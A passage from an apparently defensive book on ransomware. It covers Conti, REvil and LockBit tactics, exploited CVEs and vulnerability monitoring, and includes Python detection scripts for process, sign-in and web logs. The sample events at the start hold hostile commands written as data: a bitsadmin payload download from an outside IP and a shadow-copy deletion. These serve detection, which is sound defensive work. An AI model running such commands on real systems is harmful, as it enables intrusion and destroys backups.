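    {"ts": "2023-01-15T10:05:10", "host": "WS01", "user": "CORP\\jdoe", "cmdline": r"C:\Users\jdoe\AppData\Local\Temp\adfind.exe -f objectcategory=computer"},
    {"ts": "2023-01-15T10:08:00", "host": "WS01", "user": "CORP\\jdoe", "cmdline": r"bitsadmin /transfer upd /download /priority high http://198.51.100.20/u.dll C:\ProgramData\u.dll"},
    {"ts": "2023-01-15T09:00:00", "host": "WS02", "user": "CORP\\asmith", "cmdline": "net user asmith /domain"},  # routine, not matched
    {"ts": "2023-01-15T10:40:00", "host": "FS01", "user": "CORP\\svc_backup", "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
]


def classify(cmdline):
    """Return (stage, description) for a known pattern, or None."""
    for stage, name, rx in PATTERNS:
        if rx.search(cmdline):
            return stage, name
    return None


def analyze(events, min_discovery=3, window_s=600):
    """One medium alert per host for a discovery burst, plus one alert per download or impact hit."""
    hits = defaultdict(list)
    for e in events:
        c = classify(e["cmdline"])
        if c:
            hits[e["host"]].append((datetime.fromisoformat(e["ts"]), c[0], c[1], e["cmdline"]))

    alerts = []
    for host, hs in hits.items():
        hs.sort()
        disc = [h for h in hs if h[1] == "discovery"]
        for i in range(len(disc)):
            j = i
            while j + 1 < len(disc) and (disc[j + 1][0] - disc[i][0]).total_seconds() <= window_s:
                j += 1
            if j - i + 1 >= min_discovery:
                alerts.append({"host": host, "severity": "medium", "type": "discovery burst",
                               "count": j - i + 1, "techniques": sorted({h[2] for h in disc[i:j + 1]})})
                break
        for ts, stage, name, cmd in hs:
            if stage in ("download", "impact"):
                alerts.append({"host": host, "severity": "critical" if stage == "impact" else "high",
                               "type": name, "cmdline": cmd})
    return alerts


if __name__ == "__main__":
    for a in analyze(EVENTS):
        print(a)
```

Discovery commands on their own are noisy on administrator workstations, which is why the example requires several within ten minutes before alerting; shadow-copy deletion, by contrast, is rarely legitimate outside backup maintenance and is worth alerting on every time. Note that Security Event ID 4688 only carries the command line when the "Include command line in process creation events" policy is enabled.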

For each machine that gets compromised, Diavol creates a unique identifier, which is then communicated back to the C2 address.

Figure 1.4 – Overview of the attack pattern for Diavol

This overview shows the different stages and attack patterns in a Diavol attack, where the final payload is typically distributed to all parts of the infrastructure using RDP.

Conti ransomware

Conti was first seen in May 2020 and was one of the most common ransomware variants in 2021. The main point of access was mostly through spear-phishing campaigns, which, in most cases, utilized malicious JavaScript code that would first drop a malware loader into the infrastructure using either TrickBot, IcedID, or BazarLoader.

They have also been known to use brute-force attacks using RDP.

Like Diavol and BazarLoader, Conti uses a range of built-in commands for reconnaissance, such as nltest, whoami, and net.exe. Then, they use Cobalt Strike to escalate privileges to SYSTEM and set up communication with their C2 servers.

Then, the attackers use different tools to scan the network and collect information, such as AdFind, Router Scan, SharpChrome, and Seatbelt. They also use Kerberoasting tools and Mimikatz to collect credential hashes or extract plaintext passwords from memory.

They spend time looking into local user account profiles in search of important data or files that can be used for leverage for the ransom, such as the following:

  • Outlook (OST files)
  • Login data stored within Chrome
  • KeePass/LastPass information
  • FileZilla (sitemanager.xml)
  • Local OneDrive folders

They were also known to use common Windows vulnerabilities such as Zerologon (CVE-2020-1472), PrintNightmare (CVE-2021-34527), and EternalBlue (CVE-2017-0144) to gain elevated privileges and move laterally within the environment.

Cisco Talos security researchers got a hold of leaked Conti documentation from a disgruntled insider that shows the attack patterns, scripts, and how to use the different tools. You can see a PDF file of the summary here: https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/639/original/Conti_playbook_translated.pdf?1630583757.

Once they have gotten elevated privileges, they use PsExec (part of the Sysinternals suite from Microsoft) to copy and execute Cobalt Strike Beacon on most of the systems in the network. Once they have gotten access to the domain controllers, they use built-in services such as Group Policy to disable Defender services to avoid detection.

Once that is done, the attackers run the final payload, which, as with Diavol, will stop a lot of different built-in services that can have locks on different files on the operating system, such as the following:

  • Microsoft Exchange
  • Microsoft SQL
  • Acronis Backup
  • Backup Exec

Most ransomware also has a built-in list of folders that it excludes during the encryption process. This is to ensure that the systems keep running (and can display the ransom note) after the data has been encrypted. The list is in most cases static and contains folders such as the following:

  • AppData
  • Program Files
  • Boot
  • Windows
  • WinNT

However, if you have a different partition layout or data such as the domain controller’s database stored on another partition, for instance, it will get encrypted. Conti also skips some file extensions such as .exe, .dll, .sys, and .lnk. After it is done with the encryption, all files have a .CONTI extension, and within each folder, it also creates a ransom note.

Sodinokibi/REvil ransomware

Sodinokibi/REvil is maybe the most prolific ransomware group on our list. They were the ones behind the infamous Kaseya VSA supply chain attack, and they were also behind the attacks on other large companies such as Travelex and JBS Foods. JBS Foods, which is also the world’s largest meat producer, ended up paying 11 million dollars to REvil to get access back to their data.

Like the other ransomware operators mentioned earlier, REvil has been known to use malware loaders such as IcedID, as well as brute-force attacks and the exploitation of known vulnerabilities such as those in FortiOS VPN, Pulse VPN, BlueGate (Windows RD Gateway), Citrix, and Oracle WebLogic Server, to name a few.

They were also one of the first ransomware operators to target VMware ESXi virtual machines. They used the built-in esxcli command line to force-stop the virtual machines (esxcli vm process kill) so that the disk files were no longer locked, and then encrypted the data directly at the VMware datastore level.

For one customer that I was working with that got hit with Sodinokibi, the initial point of entry was a compromised virtual machine (via RDP) in Azure, which was then used to access the virtual infrastructure.

Like the others, REvil had a collection of scripts and utilities that they used for reconnaissance of the network. One thing that sets them apart, however, is that they were able to reboot machines into Safe Mode with Networking and still run their payload. The advantage is that most EDR services do not start in safe mode, so the payload could run unhindered and disable the security tooling before the machine was rebooted back into normal mode.

Fortunately, in early 2022, the Russian government arrested multiple key resources behind the REvil ransomware group on request from the US; you can read more about it here: https://www.wsj.com/articles/russia-says-it-raided-prolific-ransomware-group-revil-with-arrests-seizures-11642179589.

LockBit ransomware

One of the most common ransomware groups at the time of writing is LockBit, which has impacted a lot of large organizations since its emergence back in 2019, such as Accenture, which was hit in late 2021.

LockBit, like the other Ransomware as a Service (RaaS) operators, used a well-known Russian-speaking forum known as XSS to advertise their affiliate program. After the XSS operators banned all ransomware topics on their forum, LockBit started to use its own infrastructure to advertise its affiliate program.

LockBit has been known to recruit insiders to gain access to infrastructure using their affiliate program, enticing them with millions of dollars in exchange for access to valuable company data:

Figure 1.5 – A screenshot showing the recruitment program for LockBit

LockBit advertised on their website that their method of encrypting data was a lot faster than other ransomware variants and that they have great pride in their programming in terms of encryption.

Also, their ransomware (like most other ransomware variants) does not function in Russian-speaking countries or on infrastructure where the system language is set to Russian. In some cases, there is a built-in detection mechanism that will inform the operators or stop the information collection process if the system is running Russian.

They use a similar modus operandi to the other groups we've talked about; however, they have also evolved a lot during the last year. In October 2021, there were also rumors that they have developed their first LockBit Linux-ESXi variant.

ESXi ransomware isn’t something new, but this new variant targets both vCenter and VMware ESXi while utilizing vulnerabilities to be able to gain access to the VMware environment.

The latest additions

Now, in 2023, we have seen new threat groups emerge that contain affiliates or members from older groups.

We have groups such as the following:

  • Royal
  • RansomHouse
  • BlackCat
  • ClopLeaks

There are dozens more. On social media, we can see new victims being published daily. Some sources that can be used to follow these different threat groups are the following Twitter profiles:

Because of the frequency with which we're seeing new victims being impacted, it is important to use these sources to get a view of the current trends and understand which groups are the most active.

Looking at the big picture

Now that we have looked at some of the main attack vectors and more closely at some of the different ransomware variants, I wanted to paint a bigger picture and provide some important considerations.

Let us start by looking at the first phase of a ransomware attack where the initial compromise happens:

  • In most cases, phishing attacks are utilized to get the end user to click on a malicious attachment to run some specific payload to trigger malware, such as BazarLoader, on the compromised endpoint.
  • Other attacks start by exploiting a vulnerable endpoint such as Exchange, RDP, or other third-party services that are available. We have seen that after an affiliate has gained access to an organization, that access is sold to threat actors for between $5,000 and $50,000, depending on the type of access.

Once the attacker has managed to gain access, the second phase starts which is collecting information:

  • The initial stage after getting access to an endpoint is assessing the environment, using built-in scripts and tooling to get information about machines/networks/users/data. This information is also used to gather proof of what kind of organization they have gained access to if they want to sell their access to it later.

The following table summarizes some of the main tools and scripts that ransomware operators use to assess an environment and try and gain further access to the environment.

It should be noted that this is not a complete list; I have just specified some I have encountered in different customer scenarios. However, it gives a better view of the tooling that hackers are using to collect information:

  • ADFind
  • Atera
  • Invoke-SMBAutoBrute
  • Advanced IP Scanner
  • SharpView
  • BloodHound
  • Net-GPPPassword
  • MSSQLUDP Scanner
  • Net Use
  • DCSync
  • SharpChrome
  • Zero.exe
  • NetScan
  • Router Scan
  • BITSAdmin
  • Splashtop Remote
  • Esentutl
  • Mimikatz
  • Invoke-ShareFinder
  • SQLCMD
  • WMIC
  • Cobalt Strike
  • PowerView
  • UAC-TokenMagic
  • Nltest
  • WDigest
  • Process Hacker
  • Kerberoast
  • AnyDesk/TeamViewer
  • Getuin
  • FileZilla SFTP
  • Seatbelt

Figure 1.6 – Table overview of commonly used tools and scripts

In addition to some of the scripts/tooling mentioned in the preceding table, attackers use many built-in capabilities to navigate the environment. These can be features such as RDP and File Explorer. Some operators have also been known to use Group Policy Management to perform operations across multiple machines at the same time.

At the time of writing, the majority of ransomware is aimed at Windows-based environments, because the majority of all enterprises are running Windows in large parts of their data centers. This includes Active Directory, file servers, and SQL servers, as well as Windows endpoints. However, we have also seen ransomware operators moving to new target types. There are also new ransomware variants emerging that are aimed at other services, such as NAS services. One of these new variants is called Deadbolt, which is aimed at QNAP NAS appliances. There have also been some variants for Linux and Mac OS X, so this is something that we should all pay attention to.

Identity-based attacks

Now that we have taken a look at the different attack vectors and some of the different ransomware variants and their attack patterns, I want to look at some of the common attack vectors in more depth, starting with identity-based attacks.

Identity-based attacks are becoming more and more common with the move to public cloud services such as Microsoft 365.

SaaS services have a common property, which is that they are reachable from the internet, which means that anyone, including an attacker, can reach the login endpoint and attempt to authenticate.

As mentioned earlier, one of the common attack vectors is credential stuffing, where an attacker tries to log in with a list of usernames and/or email addresses that have been taken from a breach.

The following screenshot shows login attempts for one of our tenants, where it is typical that we see numerous login attempts each day from multiple locations.

This screenshot is a snippet from our sign-in log coming from Azure AD and parsed using Log Analytics (which I will cover in Chapter 7, Protecting Information Using Azure Information Protection and Data Protection):

Figure 1.7 – Overview of blocked authentication attempts to Office 365

Now, since this is Azure AD, Microsoft has built in different IP filters to stop login attempts coming from known malicious IP addresses, which means they are stopped before they can try and authenticate. However, this just shows how much authentication traffic is coming in a short period.

So, where are they coming from? How did the attackers find the user account that they are trying to log in to?

In many cases, attackers have different scrapers and scripts that crawl through websites to collect all the email addresses they can find. This can also include email addresses that were collected from an existing data breach.

A good way to see where credentials have been stolen from is by checking the affected email address at https://haveibeenpwned.com. The following screenshot shows the result where the email address was not breached:

Figure 1.8 – Information showing that no user information was found

However, if the information is found in one of the data breaches that the service has access to, the following result will appear:

Figure 1.9 – Information showing that user information was found in a breach

In some cases, the service will report only that the email address was collected, not that a password was exposed. This is likely because the data source is not available to haveibeenpwned.com, or because the attackers have bots that scrape or crawl websites for information such as email addresses.

There are even free services online that can be used to extract emails from a URL, such as Specrom Analytics (https://www.specrom.com/extract-emails-from-url-free-tool/) or using a simple Python script that can do the same as well. Then, we can compare whether the user accounts where we are getting multiple authentication attempts are easily searchable from the public website.
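The two checks described above, the sign-in log review from Figure 1.7 and the comparison against addresses published on the website, as an added example (not code from the book); the sign-in records, result codes, and the contact page HTML are constructed samples, and the thresholds are assumptions you would tune for your tenant:

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of Azure AD-style sign-in records (not real tenant data).
# Fields: UTC timestamp, source IP, user principal name, result code.
# Result code 0 means success; 50126 is Azure AD's "invalid username or password".
SIGNIN_LOGS = [
    "2022-03-01T08:00:01Z 203.0.113.10 alice@example.com 50126",
    "2022-03-01T08:00:02Z 203.0.113.10 bob@example.com 50126",
    "2022-03-01T08:00:03Z 203.0.113.10 carol@example.com 50126",
    "2022-03-01T08:00:04Z 203.0.113.10 dave@example.com 50126",
    "2022-03-01T08:00:05Z 203.0.113.10 dave@example.com 0",
    "2022-03-01T08:15:00Z 198.51.100.7 alice@example.com 50126",
    "2022-03-01T08:15:20Z 198.51.100.7 alice@example.com 0",
]

# Constructed snippet of a public "contact us" page (not a real site).
WEBSITE_HTML = """
<html><body>
<p>Sales: <a href="mailto:Alice@example.com">Alice@example.com</a></p>
<p>Support: carol@example.com, general enquiries: info@example.com</p>
</body></html>
"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def parse_signins(lines):
    """Turn the raw records into dicts with typed fields."""
    records = []
    for line in lines:
        ts, ip, upn, result = line.split()
        records.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "ip": ip,
            "upn": upn.lower(),
            "result": int(result),
        })
    return records


def find_credential_stuffing(records, min_accounts=3):
    """Map source IP -> sorted accounts for IPs whose failed sign-ins hit at
    least min_accounts distinct accounts. One user mistyping their own
    password (one account, many failures) is deliberately not flagged."""
    failed = defaultdict(set)
    for r in records:
        if r["result"] != 0:
            failed[r["ip"]].add(r["upn"])
    return {ip: sorted(users) for ip, users in failed.items()
            if len(users) >= min_accounts}


def successes_from_flagged_ips(records, flagged):
    """The finding that matters most: a successful sign-in from an IP that
    was running a list of accounts against the tenant. Sorted (ip, upn)."""
    hits = {(r["ip"], r["upn"]) for r in records
            if r["result"] == 0 and r["ip"] in flagged}
    return sorted(hits)


def extract_emails(html):
    """Lower-cased set of addresses visible in a page body."""
    return {m.lower() for m in EMAIL_RE.findall(html)}


def publicly_exposed_targets(flagged, html):
    """Accounts that are both under attack and printed on the website."""
    targeted = set().union(*flagged.values()) if flagged else set()
    return sorted(targeted & extract_emails(html))


if __name__ == "__main__":
    recs = parse_signins(SIGNIN_LOGS)
    flagged = find_credential_stuffing(recs)
    print("credential stuffing sources:", flagged)
    print("successes from those sources:", successes_from_flagged_ips(recs, flagged))
    print("attacked accounts exposed on the website:",
          publicly_exposed_targets(flagged, WEBSITE_HTML))
```

Accounts that show up in both lists are the ones whose exposure you can reduce by trimming the public page; a success from a flagged IP is the event to escalate regardless.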

One way to reduce the amount of spam and brute-force attacks against users’ identities is by limiting the amount of public information that is available.

For instance, if your corporate website is published behind a Web Application Firewall (WAF), you can block traffic based on user agents.

A user agent is a string with which the client software (the browser) identifies itself to the web server. Most common browsers today send one; for example, Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Edge/97.0.1072.76.

Important note

You can use the following website to determine what kind of known user agents are used to crawl websites and what is legitimate end user traffic: https://user-agents.net/my-user-agent.

User agents are easily forged and can even be changed using built-in mechanisms within Google Chrome developer mode, for instance, but most automated crawling using scripts tends not to bother with changing the user agent.

So, in 4 hours, I have a lot of traffic coming to my public website, which is being crawled from someone that is running something that identifies as python-requests/2.26.0, which is most likely an automated script to crawl my website:

Figure 1.10 – Web scraping attempts against my website in 4 hours using data collected in Azure Log Analytics

Having firewall rules in place to block a specific user agent would reduce the amount of crawling and would also reduce spam/phishing targeting our organization. However, if the attackers make the extra effort to alter the user agent, then blocking only certain user agents will have little effect.
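The user agent review from Figure 1.10, as an added example (not code from the book): it summarizes constructed web server log lines per user agent and lists the automated ones busy enough to justify a WAF rule. The log lines, the marker list, and the threshold are assumptions; a script that forges a browser user agent is classified as a browser here, which is exactly the limitation noted above.

```python
import re
from collections import defaultdict

# Constructed sample of web server access log lines (not real traffic).
# Format: ip ident user [time] "request" status "user-agent"
ACCESS_LOG = [
    '203.0.113.5 - - [01/Mar/2022:10:00:01 +0000] "GET /contact HTTP/1.1" 200 "python-requests/2.26.0"',
    '203.0.113.5 - - [01/Mar/2022:10:00:02 +0000] "GET /about HTTP/1.1" 200 "python-requests/2.26.0"',
    '203.0.113.5 - - [01/Mar/2022:10:00:03 +0000] "GET /team HTTP/1.1" 200 "python-requests/2.26.0"',
    '203.0.113.5 - - [01/Mar/2022:10:00:04 +0000] "GET /careers HTTP/1.1" 200 "python-requests/2.26.0"',
    '203.0.113.6 - - [01/Mar/2022:10:00:05 +0000] "GET /contact HTTP/1.1" 200 "python-requests/2.26.0"',
    '203.0.113.6 - - [01/Mar/2022:10:00:06 +0000] "GET /staff HTTP/1.1" 404 "python-requests/2.26.0"',
    '198.51.100.20 - - [01/Mar/2022:10:01:00 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36"',
    '198.51.100.20 - - [01/Mar/2022:10:01:05 +0000] "GET /contact HTTP/1.1" 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36"',
    '198.51.100.21 - - [01/Mar/2022:10:02:00 +0000] "GET /contact HTTP/1.1" 200 "curl/7.79.1"',
    '198.51.100.22 - - [01/Mar/2022:10:03:00 +0000] "GET /contact HTTP/1.1" 200 ""',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) "([^"]*)"$')

# User-agent substrings typical of HTTP libraries and command-line tools.
# Legitimate automation (monitoring, partner integrations) uses these too,
# so the output is a review list for an allow/block decision, not an auto-block.
AUTOMATION_MARKERS = ("python-requests", "python-urllib", "curl/", "wget/",
                      "go-http-client", "scrapy", "libwww-perl", "java/")


def parse_access_log(lines):
    """Parse lines in the format above; lines that do not fit are skipped."""
    entries = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ip, ts, request, status, ua = m.groups()
            entries.append({"ip": ip, "time": ts, "request": request,
                            "status": int(status), "ua": ua})
    return entries


def classify_user_agent(ua):
    """'empty', 'automated' or 'browser'. A forged browser string is
    reported as 'browser'; this check only catches scripts that do not
    bother to change the default."""
    if not ua.strip():
        return "empty"
    low = ua.lower()
    if any(marker in low for marker in AUTOMATION_MARKERS):
        return "automated"
    return "browser"


def summarize_user_agents(entries):
    """Per user agent: request count, distinct source IPs, classification."""
    stats = defaultdict(lambda: {"requests": 0, "ips": set()})
    for e in entries:
        stats[e["ua"]]["requests"] += 1
        stats[e["ua"]]["ips"].add(e["ip"])
    return {ua: {"requests": s["requests"], "ips": sorted(s["ips"]),
                 "class": classify_user_agent(ua)}
            for ua, s in stats.items()}


def block_candidates(summary, min_requests=5):
    """User agents worth a WAF rule: automated or empty, and busy enough
    that blocking them actually changes the volume of crawling."""
    return sorted(ua for ua, s in summary.items()
                  if s["class"] != "browser" and s["requests"] >= min_requests)


if __name__ == "__main__":
    summary = summarize_user_agents(parse_access_log(ACCESS_LOG))
    for ua, s in sorted(summary.items(), key=lambda kv: -kv[1]["requests"]):
        print(f'{s["requests"]:4d} {s["class"]:9s} {len(s["ips"])} ip(s)  {ua!r}')
    print("block candidates:", block_candidates(summary))
```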

Here is a great write-up on how to block or at least make it more difficult for crawlers to scrape your website: https://github.com/JonasCz/How-To-Prevent-Scraping.

Sometimes, your end user email addresses might be available on other sources that you might not have control over. However, a quick Google search can reveal some information about where the email address might be sourced.

Another way that access brokers or affiliates collect information is by using phishing attacks. There are many examples of this. One that we saw earlier this year is where users are sent an email that contains embedded links that take the victim to a phishing URL that imitates the Office 365 login page and prefills the victim’s username for increased credibility.

When the user tries to enter their username and password on the fake login page, there are scripts on the server that collect the user information and upload it to a central storage repository or on the server.

How are vulnerabilities utilized for attacks?

So, now that we have taken a closer look at some of the ways that attackers try to collect information about our end users either from scraping, phishing, or credential stuffing, we are going to take a closer look at some of the vulnerabilities that some of the different ransomware operators have been known to use in their attacks. Later in this section, I will go through how you can monitor vulnerabilities against your services.

Many of the vulnerabilities that we will go through are utilized either for initial compromise, to gain elevated access on a compromised machine, or for lateral movement. The aim is to give you some understanding of how easy it can be to compromise a machine or a service, and how short the time is between a high-severity vulnerability becoming known and ransomware operators starting to leverage it.

So, we are going to focus on the following vulnerabilities:

  • PrintNightmare: CVE-2021-34527
  • Zerologon: CVE-2020-1472
  • ProxyShell: It consists of three different vulnerabilities that are used as part of a single attack chain: CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207
  • Citrix NetScaler ADC: CVE-2019-19781

PrintNightmare

Let’s start with PrintNightmare, which was a vulnerability that was published in July 2021. Using this vulnerability, an attacker could run arbitrary code with system privileges on a remote or local system, so long as the Print Spooler service was enabled. So, in theory, you could utilize this vulnerability to make the domain controllers run arbitrary code, so long as the Print Spooler service was running. This is because of the functionality within a feature called Point and Print, which allows a user to automatically download configuration information about printers, including drivers, directly from the print server to the client.

All Microsoft Common Vulnerabilities and Exposures (CVEs) get published on MSRC with dedicated support articles, highlighting which systems are affected and recommendations in terms of workaround and other countermeasures, as seen here for PrintNightmare: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527.

In regard to PrintNightmare, there were multiple scripts that the InfoSec community made that could easily be used; as an example, here’s a simple PowerShell payload that exploited the vulnerability, which did not require administrator access rights and comes with a predefined DLL file that creates a local admin account on the machine: https://github.com/calebstewart/CVE-2021-1675.

Benjamin Delpy, the creator of the popular tool called Mimikatz, also created a proof of concept by setting up a public print server that you could then use from an endpoint to connect to that public server, which would then automatically create a CMD pane running as a local system context.

It took Microsoft many weeks before they managed to provide patches and recommendations on how to fix this. In the middle of August, only 1 month later, there were already news articles about ransomware operators that were exploiting the PrintNightmare vulnerability to compromise organizations.

Microsoft’s recommendation when the vulnerability became known was to disable the Print Spooler service until a security fix was available. It also made many administrators realize that the Print Spooler service is not required on servers that are not end user facing, such as Citrix/RDS servers.

Important note

A general best practice is to ensure that only required services are running on a server – for example, the Print Spooler service should not be running on a domain controller. This guidance document from Microsoft provides a list of the different services and recommendations for each of them: https://docs.microsoft.com/en-us/windows-server/security/windows-services/security-guidelines-for-disabling-system-services-in-windows-server.

Zerologon

Next, we have Zerologon, another high-severity CVE that exploits a vulnerability in the Netlogon process in Active Directory, which allows an attacker to impersonate any computer, including a domain controller.

To be able to leverage this vulnerability, the attacker needed to be able to communicate with the domain controllers, for instance, from a Windows client that is joined to the Active Directory domain.

Then, the attackers would spoof another domain controller in the infrastructure and use the MS-NRPC protocol to change the password for the machine account in Active Directory, which is as simple as sending a single TCP frame with the new password:

Figure 1.11 – Zerologon attack process

Once the new password had been accepted, the attackers could then use that new account to start new processes with an Active Directory domain controller context, which was then used to compromise the remaining infrastructure. Zerologon has been used in many ransomware attacks to, through lateral movement, compromise Active Directory and gain access to the domain controllers.

This vulnerability was fixed in a patch from Microsoft in August 2020. In September 2020, the security researchers from Secura who discovered the vulnerability issued their research, and within a week, there were already different proofs of concept published on how you can leverage the exploit. You can find the link to the initial whitepaper on the vulnerability here: https://www.secura.com/uploads/whitepapers/Zerologon.pdf.

In the months after, many organizations were hit by Ryuk, which used the Zerologon vulnerability. On average, most security researchers state that it takes between 60 and 150 days (about 5 months) for an average organization to install a patch once it has been released by the vendor.

ProxyShell

Then, we have ProxyShell, which is a vulnerability consisting of three different CVEs used as part of a single attack chain that affected Microsoft Exchange 2013/2016/2019 and allowed attackers to achieve pre-authentication remote code execution (RCE).

The main vulnerabilities lie in the Client Access Service (CAS) server component in Exchange, which is exposed to the internet by default to allow end users to access email services externally.

In short, the ProxyShell exploit does the following:

  • Sends an Autodiscover request to leak the user's LegacyDN information with a known email address.
  • Sends a MAPI request to the CAS servers to leak the user’s SID using the LegacyDN.
  • Constructs a valid authentication token from the CAS service using the SID and email address.
  • Authenticates to the PowerShell endpoint and executes the code using the authentication token. The example code can be found on GitHub at https://github.com/horizon3ai/proxyshell.

Horizon3.ai released a Python script to showcase how easy it is to exploit this vulnerability (https://github.com/horizon3ai/proxyshell), where you just need to run the script and point it to an Exchange CAS server.

All these vulnerabilities were patched in April 2021, but the information was published publicly in June 2021.

In February 2022, it was discovered that a significant number of organizations had failed to update their Exchange services, even though it was urgently required. More precisely, 4.3% of all Microsoft Exchange services that were publicly accessible were still unpatched for the ProxyShell vulnerability. Out of those that did apply the ProxyShell patch, 16% of organizations did not install the subsequent patches that were released from July 2021 onward, which left them open to attacks. As a result, many organizations had still not fully eliminated the vulnerability, even after six months had passed. As seen in the following Shodan screenshot from February 2022, there was still quite a high number of public-facing Exchange servers that had the vulnerability present:

Figure 1.12 – Shodan search for vulnerable ProxyShell Exchange servers

Using a free account in Shodan.io, you can search for different applications and/or services and get an overview map of vulnerabilities. In this case, I used the http.component:"outlook web app" search tag.

Citrix ADC (CVE-2019-19781)

Lastly, we have the vulnerability in the Citrix ADC (CVE-2019-19781), which was also a high-severity vulnerability that allowed unauthenticated attackers to write a file to a location on disk. It turned out that by using this vulnerability, you could achieve RCE on the ADC appliance.

This had multiple implications since an ADC is often a core component in the network to provide load balancing and reverse proxy services for different services. Therefore, it most likely had many network interfaces with access to different zones, and in many cases, had access to usernames/passwords and SSL certificates.

The vulnerability itself was a directory traversal bug that reaches a Perl script used to write files in XML format to the appliance. These files are then processed by the underlying operating system, which, in turn, allows for RCE.

This caused a lot of turmoil, with close to 60,000 vulnerable Citrix ADC servers being affected, because the vulnerability was out and Citrix did not have a patch ready. The vulnerability became public at the end of 2019, while Citrix had an expected timeframe of patches being available at the end of January 2020. This vulnerability also affected four major versions of the ADC platform, which also meant that the patch needed to be backported to earlier versions, which affected the timeline of when the patch could be ready.

While Citrix provided a workaround to mitigate the vulnerability, this did not work for all software editions because of licensing issues, with features that were not available.

Eventually, the patch was released and the vulnerability was closed, but many ADC instances were compromised. Many got infected with simple bitcoin mining scripts and others were used to deploy web shells.

One group, which was later referred to as Iran Network Team, created a web shell on each of the ADC appliances that they compromised. The group was pretty successful in deploying a backdoor to a significant number of ADC appliances. Many of these appliances were later patched but remained compromised because of the password-less backdoor the attackers had left on the devices. This web shell could easily be accessed using a simple HTTP POST request.

In addition, another threat actor created a new backdoor named NOTROBIN. Instead of deploying a web shell or bitcoin mining, they would add their own shell with a predefined infection key. In addition, they would attempt to identify and remove any existing backdoors, as well as attempt to block further exploitation of the affected appliances. They did this by deleting new XML files or scripts that did not contain a per-infection secret key. This meant that a compromised ADC appliance was only accessible through the backdoor with the infection key.

Looking back at these vulnerabilities that I’ve covered, many of them were used as part of a ransomware attack. It is important to note the following:

  • The time between when a vulnerability is discovered and an attacker starts exploiting it is becoming shorter and shorter.
  • You should always apply security patches as soon as possible because in many cases, you might not realize the impact of a vulnerability until it is too late.
  • After a vulnerability is known, if it takes too much time to install the patch to remediate it, chances are that someone might have already exploited the vulnerability.
  • Also, in many cases, an attacker might have already been able to exploit the vulnerability to create a backdoor that might still be utilized even after the patch is installed.
  • Many vulnerabilities evolve after the initial publication. This means that after a vulnerability becomes known, many security researchers or attackers can find new ways to use the vulnerability or find vulnerabilities within the same product/feature/service, as was the case with PrintNightmare.
  • The number of CVEs is increasing year by year: https://www.cvedetails.com/browse-by-date.php.
  • High-severity vulnerabilities are not limited to Windows. This also affects other core components, including firewalls and virtualization platforms such as VMware.
  • Vulnerabilities from a ransomware perspective can be used for both initial access and lateral movement, depending on what kinds of services are affected by the vulnerability.

Now that we have taken a closer look at some of the different attack vectors, such as identity-based attacks, and also looked at some of the vulnerabilities that have been utilized for ransomware attacks, such as PrintNightmare and Zerologon, let’s take a closer look at how to monitor for vulnerabilities.

Monitoring vulnerabilities

There will always be vulnerabilities and bugs, so it is important to pay attention to updates that might impact your environment.

An average business today might have somewhere between 20 and 100 different pieces of software installed within their environment, often from a similar number of vendors. As an illustration, consider a small company running an on-premises environment with the following software:

  • VMware: Virtualization
  • Fortinet: Firewall
  • HP: Hardware and server infrastructure
  • Citrix: Virtual apps and desktop
  • Microsoft Exchange: Email
  • Microsoft SQL: Database
  • Windows: Clients and servers
  • Chrome: Browser
  • Microsoft Office: Productivity
  • Cisco: Core networking, wireless
  • Adobe: PDF viewer/creator
  • Apache HTTP: Web server

In addition to this, end users have their own applications that they need and there may be other line-of-business applications that you might need as part of your organization. Here, we have already listed over 10 different vendors and many applications/products that need to be patched. How do we maintain control and monitor for vulnerabilities?

This falls into a category called vulnerability management, which is the practice of identifying and remediating software vulnerabilities. Remediating software vulnerabilities is done either through configuration changes or, in most cases, by applying software patches from the vendors. We will go into using tooling to patch infrastructure and services in Chapter 10, Best Practices for Protecting Windows from Ransomware Attacks, but one thing I want to cover is how to monitor vulnerabilities.

While many commercial products can be used, I also tend to use the online data sources listed in the following section, and many sources on social media have been extremely useful as well.

For example, you can use a centralized RSS feed to monitor security advisories from different vendors. This is the most common tool that I use to monitor vulnerabilities from vendors. Most websites have an RSS feed that I can collect into an RSS reader such as Feedly. Some of the RSS feeds that I use are the following:

In addition to the different software vendors, I also follow the centralized RSS feed from NIST. However, this is not vendor-specific, so often, I use it to correlate information that’s vendor-specific to NIST.

It should be noted that, depending on the different vendors you use, monitoring all these RSS feeds can be a time-consuming and repetitive process. In many cases, you should limit the number of RSS feeds to a minimum. Some vendors also have good filtering capabilities so that you do not get information about vulnerabilities related to products you do not have. Going through the information from these feeds is something that should be turned into a routine. In larger IT teams, this task should be rotated between multiple people – for instance, you should have someone responsible for going through the information and presenting relevant information on Monday mornings.
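The feed routine described above, as an added example (not code from the book): it filters RSS advisory items against the kind of vendor inventory listed earlier in this section and merges the vendor advisory with the NIST record for the same CVE. Both feeds, their URLs, and the CVE ids (CVE-2099-*) are constructed placeholders, and the keyword inventory is an assumption you would replace with your own.

```python
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

# Product keywords for an on-premises inventory like the one in the text.
# Keys are the vendor/product names you track; values are strings that
# identify that product in an advisory title or description (assumed list).
INVENTORY = {
    "Fortinet firewall": ["fortios", "fortigate"],
    "Citrix ADC": ["citrix adc", "netscaler"],
    "Microsoft Exchange": ["exchange server"],
    "VMware": ["vcenter", "esxi"],
}

# Constructed RSS feeds with placeholder CVE ids; not real advisories.
VENDOR_FEED = """<?xml version="1.0"?>
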